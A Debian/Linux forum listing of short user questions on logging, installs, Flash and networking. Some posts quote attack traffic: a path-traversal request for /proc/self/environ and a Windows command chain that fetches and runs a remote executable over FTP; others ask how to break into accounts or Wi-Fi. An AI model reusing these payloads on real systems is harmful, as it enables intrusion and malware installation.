Debian :: PHP Hack Attempt Logs?
Apr 13, 2011
I have received the following log messages on my Debian Squeeze webserver:
Apr 13 15:16:37 vps suhosin[4699]: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'controller' (attacker '75.126.235.115', file '/var/www/xxxxxxxxxxxxx.com
75.126.235.115 - - [13/Apr/2011:15:16:37 +0100] "GET /index.php?option=com_product&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8018 "-" "libwww-perl/6.01"
[code]....
View 1 Replies
Aug 2, 2010
Running Ubuntu 10.04 I noticed my hard disc rumbling for longer than normal and louder. Not doing anything demanding to cause hard disk activity like this so I was suspicious so I checked my process list with 'top' command in the console terminal. At the top was mount.ntfs running. Eventually it stopped running after 20 seconds or so. At the time I have not been accessing NTFS filesystems, but I do have them. I have a dual boot Ubuntu 10.04 and Windows 7. In Ubuntu I've mounted the Windows main C drive and on the same hard disk a partitioned drive for sharing files between the OSs. I know mount.ntfs is a standard program but was it being run on my machine, instigated externally here? Was the running of mount.ntfs an attempt from outside to hack into Ubuntu and the mounted Windows areas of my machine via a backdoor connection or vulnerability? I've restarted my machine since then. Are there any logs I can check for malicious attempts to break in?
View 9 Replies
Aug 27, 2010
I finally found a blank DVD), I, of course, have a few questions: 1. Besides costs, what are some benefits of Linux over Windows? I'm sure with some use, I'll figure some of them out myself; my main problem with Windows (err, Microsoft) is their attempt to monopolize computers. If you have Windows, you have to deal with Microsoft's attempt to keep your computer free of all non-Microsoft products. 2. How do I resize the desktop? When I start up Debian I get an 'Out of Range' message on my screen, then after I hit CTRL Alt + a few times, I'm left with an oversized GUI- it's bigger than my monitor so I have to bring the mouse to the side/bottom to scroll down to my taskbar. 3. How do I install programs? The first thing I tried installing was Google Chrome, but I get an error message "Archive not found."
View 5 Replies
Jan 16, 2011
I learned that, even while on Linux, using Iceweasel/Firefox 3.0.6 is not safe. So I tried to update the browser for my PPC G4 iMac (256 MB RAM, 800 MHz processor).
1. I downloaded a backported Iceweasel .deb from URL...
2. I then tried to install it with dpkg -i PathToIceweasel.deb
3. There was an error. I remember seeing xulrunner-1.9.1 is not installed. I tried to install that with apt-get but it was not available.
4. Now when I click on web browser I get the error "Failed to execute default Web Browser: Input/Output error".
5. What can I do without having to reinstall?
View 11 Replies
Jan 31, 2016
I am attempting to install Debian for the first time on my PC that has no CD-ROM drive. I downloaded the Jessie CD image and wrote it to a 4GB stick; it didn't work. Then I tried the netinstall image but faced the same issue.
To write the USB stick I used UNetbootin first, then tried win32diskimager and finally tried dd while the stick was not mounted.
Code:
dd if=debian.iso of=/dev/sdb BS=4MB; sync
The issue is still the same: I boot from the USB and after selecting language and keyboard it fails to detect a CD-ROM drive (no drive at all in my PC). Same behavior using normal or expert mode.
I'm also unable to manually specify the drive (it looks at /cdrom and I wanted to change it to the USB stick itself or mount the USB to /cdrom but I can't find my stick in /dev).
View 14 Replies
Mar 29, 2011
I have a problem with logging. iptables actually logs data, but it seems that for some reason it does not write to a log file:
Code:
iptables -L -v
Chain INPUT (policy ACCEPT 406 packets, 124K bytes)
pkts bytes target prot opt in out source destination
0 0 ACCEPT tcp -- any any xxxxxxxxxxx anywhere tcp dpt:xxxx
[Code]....
I checked /var/log/message and /var/log/syslog; nothing here is related to iptables. Then I created a separate file for iptables by adding this: kern.warning /var/log/iptables.log in my rsyslog.conf. It does create the iptables.log file inside /var/ but it's still empty.
View 4 Replies
Oct 9, 2010
How to hack a Facebook account? I need to, because someone broke into my Facebook and I need to get my password back.
View 7 Replies
Nov 28, 2010
Anyone who uses Linux knows that one problem with many distros (if not all) is that they can't play flash videos fullscreen and change volume at the same time. Very very very very annoying.
But I think I might have come across a fix, possibly, probably not, but who knows!!!
Here is the story. I was on my Windows partition playing some games, but I also wanted to watch Hulu on my second screen. To my amazement, flash would exit full screen (on the second screen) when it went out of focus because of a click on my main screen. So I did a search on the web and they have a flash hack that keeps it from exiting when it loses main focus. This is what we need!! Can someone with slightly more hacking know-how than me make this hack work for us over on Linux?
Here is the link:
http://bramp.net/blog/full-screen-hack-for-flash
View 3 Replies
Feb 12, 2011
Last week some bad news hit us: my uncle died at the age of 39, too young and very unexpected. We inherited his computer, but there's a password on his account. Googling didn't really work for me. I have totally 0 experience on Linux systems. Is there a way to 'hack' his account and get access to his files, photos and other stuff that is precious to us?
View 12 Replies
Jun 21, 2010
I am currently running an old school hacked Linksys WRT54G and have played around with some of the hacks. I am currently running Tomato on it and I am pretty happy (though the lack of an OpenVPN server sucks), but I need an upgrade to something with 802.11N and I bet I am not the only one. The options right now are:
1. Grab a hackable consumer 802.11 Dual Band-N router and throw DD-WRT, OpenWRT or Tomato on it again
2. Build my own using old hardware (don't really want to, feel they eat too much power for a simple task)
3. Build/buy hardware for a custom router (Atom system, or I recall back in the day some people used to sell small ATX-like boards just for embedded Linux to run as a router)
So what option would you go with and why? And if the DIY route, should I try to get some hardware that is pre-made for the job or DIY like an Atom machine?
View 2 Replies
May 25, 2010
Recently I had a problem with my gf.. now ex.. she put a password on the network.. and now I cannot get in.. any way to hack it? I just want to be able to connect online while at home..
View 8 Replies
Oct 31, 2010
I'm using 10.04 with Gnome and I've just discovered that Kaffeine works with my TV card provided I use the modprobe hack. So I created /bin/dtvfix with the following:
Code:
#!/bin/bash
/sbin/modprobe -vr dvb_bt8xx
[code]....
View 9 Replies
Jul 27, 2010
I just got a USB Bluetooth adapter for my laptop. I'm running Lenny with all the latest updates, on an Inspiron 8600. I went through and made sure I installed all the BlueZ stuff (as far as I can tell anyway). I'm trying to use it with my Droid Eris and while I have been able to successfully receive files from the phone in Linux, I noticed it seems a little buggy and I think it may have something to do with the logs. Below is a sample. As you can see, one line keeps repeating continuously. Given enough time, it will fill the entire /var partition. When I remove the Bluetooth adapter, it stops.
Code:
hal9000:/var/log# tail -F syslog
Jul 27 03:59:00 hal9000 hcid[32187]: Stopping security manager 0
Jul 27 03:59:00 hal9000 hcid[32187]: Device hci0 has been disabled
Jul 27 03:59:00 hal9000 NetworkManager: <debug> [1280217540.460076] nm_hal_device_removed(): Device removed (hal udi is '/org/freedesktop/Hal/devices/usb_device_a12_1_noserial_if0_bluetooth_hci_158315a310').
[Code]....
View 3 Replies
Jul 29, 2010
I'm trying to find out where the logs from slapd.conf (loglevel -1) go. I know in RH it is /var/log/ldap.log; I can't find it on Debian. It's probably too late.
Btw, does Debian have something like /etc/syslog.conf? If yes, where?
View 1 Replies
Jun 3, 2011
Is there a similar flash hack for the Adobe Flash player in Linux, so that when you choose fullscreen on a video, just like ....., it isn't closed when you click on the other monitor? Because it's really annoying. Sorry, I posted this once, but I got banned by "accident" (don't ask me how that can happen), and I could not find the post anymore...
In this link it is described for windows: FlashHacker Keeps Flash Videos in Full Screen on Your Dual Monitors
View 6 Replies
Jan 11, 2010
I am currently taking my CCNA course. I have come to realize that to be a great admin and secure a company's data, you first have to know its weakness. Now I have become aware of a few programs like John the Ripper, telnet password crack, nmap, and the like. Well, I have used nmap to port scan my own website for practice. I received some good intel on what ports are open and vulnerable. I am now trying to figure out how to hack in. To get my website info I used:
[Code]...
View 12 Replies
Jul 27, 2010
So 1 year ago I installed Lenny, but in the process of installation, during the splitting of the drive, I mistakenly set a separate partition for "/var/logs" instead of "/var/log". Is there any way to redirect all the logs to this separate partition (/var/logs), or is it better to go through the whole trouble* of installing Lenny again? *The trouble because it was a hell of a problem to fix grub that didn't recognize SmartArray RAID (cciss driver); the problem is that I don't really remember how I fixed it. A symbolic link won't help since physically it will still be on the other partition. Do I have any other option?
View 3 Replies
Jul 23, 2011
Well, it turns out my system has logged out more than once on its own. I had the system updated and upgraded from 7-3-11 and it did this about once a week. On 7-18-11 I did a full update and upgrade and it logged out a few times in a couple of hours. It does it while I am away and the system is in screen saver mode. I used my partition clone and restored the system back to 7-3-11. Has anyone else ever had such an issue?
View 2 Replies
Oct 6, 2009
I used to know a command to turn off various logs that run in the background of Debian. I am using Lenny on CF on an embedded board; that's why I need the logs off, to stop writes.
View 1 Replies
Apr 19, 2010
When I try to log in as me, it gets pretty far but then something happens and it automatically logs out. This happens in GNOME and KDE too. Now, I have no problem logging in as root. Is there a way I can try to stop the login process before it kicks me out, or is there a way to look at some files to tell me what's going on?
View 3 Replies
Jan 13, 2010
There is this slackbuild in which I have changed the part in bold.
Code:
#!/bin/sh
# Packager GioPower, luca.gio.85~at~gmail~dot~com
# VTK (Visualization Toolkit)
#
# The Visualization Toolkit (VTK) is an open-source, freely available
[Code]...
This will still drop stuff into /usr/lib, which is clearly anti Slackware64... I do not know enough of cmake builds, which flag do I have to pass in the slackbuild for cmake to drop stuff in /usr/lib64...?
View 2 Replies
May 1, 2014
For some time now I've been unable to see changelogs for packages to be upgraded in Wheezy; even trying with different mirrors in sources.list, all I'm getting is this:
Code:
aptitude changelog iceweasel
Err Changelog of iceweasel
E: Changelog download failed: 404 Not Found [IP: 185.31.16.185 80]
Err Changelog of iceweasel
E: Changelog download failed: 404 Not Found [IP: 185.31.16.185 80]
E: Couldn't find a changelog for iceweasel
[Code] ....
Are there maybe some specific reasons why I can't get changelogs before applying the updates? I know I can review them afterwards, it's just that I would find it convenient to have a look before updating.
View 14 Replies
Mar 21, 2015
I want to install Debian but I'd like to keep my Skype chat history.
I don't know if it's possible to just copy from %appdata% the skype folder and put it into the Debian's one.
How could I do? I read one post but it's quite old, so maybe there's something new now.
View 2 Replies
Dec 1, 2015
How to enable persistent logging with systemd? I find it really weird that all this machinery that is systemd doesn't store persistent logs, what if I'm trying to retrieve some information regarding previous boots?
For instance: I have random suspend issues, after rebooting the computer there's no trace left in the logs of what happened, and furthermore (at least in Jessie) I can no longer see a pm-suspend log.
So, at first it sounds like all you have to do is edit journald.conf setting #Storage=auto to "persistent" and create the /var/log/journal directory, but then reading here /usr/share/doc/systemd/README.Debian
Code:
Enabling persistent logging in journald
=======================================
To enable persistent logging, create /var/log/journal and set up proper permissions:
install -d -g systemd-journal /var/log/journal
setfacl -R -nm g:adm:rx,d:g:adm:rx /var/log/journal
and here [URL] ....
There are two main reasons why I decided to not enable persistent logging just yet ....
We did get corrupt journal files in the past where the journal then no longer worked at all [1]. With volatile you can just reboot and have a clean state again. Admittedly, the journal has seen a lot of improvements in the mean time and hopefully is more robust, so this point is no longer true.
We still install rsyslog by default. That means we get store them twice. This is something we don't want to do atm.
View 3 Replies
Mar 10, 2011
In a squeeze box, I installed awstats and it's working like a charm. Its cron job update the awstats database every 10 minutes (as it runs as root). But I would like to be able to update the statistics from the browser as well. So I setup everything as required and I gave "read" access to "others" to every apache log file. Now, a couple of questions came to my mind:
1. Am I compromising server's security giving "read" access to "others" to apache log files?
2. Instead of giving "read" access to "others", I could add www-data user to adm group (as apache log files are owned by root:adm and permissions are rw-r----). Is this more secure than giving "read" access to "others"?
3. If the option would be giving "read" access to "others" at the end, a log file would be owned by root:adm and its permissions be rw-r--r--. As apache rotates its log files, when Apache create a new log file, does it preserve the permissions (rw-r--r--) or create it with the default permissions (rw-r-----)?
View 1 Replies
Mar 20, 2011
When I open some video on the net, the system logs out (especially when I open ..... video). I suspect it's Flash (current version is 10.02). Is there any way to fix this? Or how to downgrade to a minor version?
Another thing as well. By default I have the GNOME version. I just installed the KDE full package from Synaptic. When I try to log in with the KDE manager, same as with Flash, it logs me out to the welcome screen.
View 1 Replies
Mar 30, 2010
I noticed I have quite a few logs that end with .[number], for example "syslog.1", "mail.info.1" etc. Why is this, and why are they there since almost nothing is logged in them?
Question 2: on my server I'm running a script like imagebam and imageshack which hosts images, so I have quite a few Apache requests to my server. I wonder why Apache takes up so much CPU for some of the requests? In htop some requests take up 1.2% CPU while others take up 3-5% etc, so the total load is about 1.50 0.58 0.84 to 2.61 1.08 1.14 with about 128-150 Apache requests all the time, while sometimes the CPU load can be almost 0 with the same amount of requests. Is this normal? What could cause this in Apache? The server is just running apache2. MySQL is running on another server.
View 1 Replies
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
May 7, 2011
I get file system errors on boot up. I found logs in /var/logs but can't access them. The second best thing I can do is to re-install Debian, but no one seems to want to say how that's done. My disk won't run in Wine (some error I don't remember) so I can't use my CD/flash drive to re-install.
1) I need to read the log files and try to fix the install
2) If I can't fix it, I need to know how to wipe the OS and do a fresh install
View 2 Replies
Jun 22, 2015
So the question is simple: what I need is to run file.sh after the user logs into the LXDE desktop.
I've been trying the whole day; I tried to put my file.sh into /etc/init.d and even created a symbolic link to /etc/rc4.d etc.
BUT after I log into the desktop nothing happens?
I am coming from Ubuntu; there it was easy, just add that script to startup applications.
View 14 Replies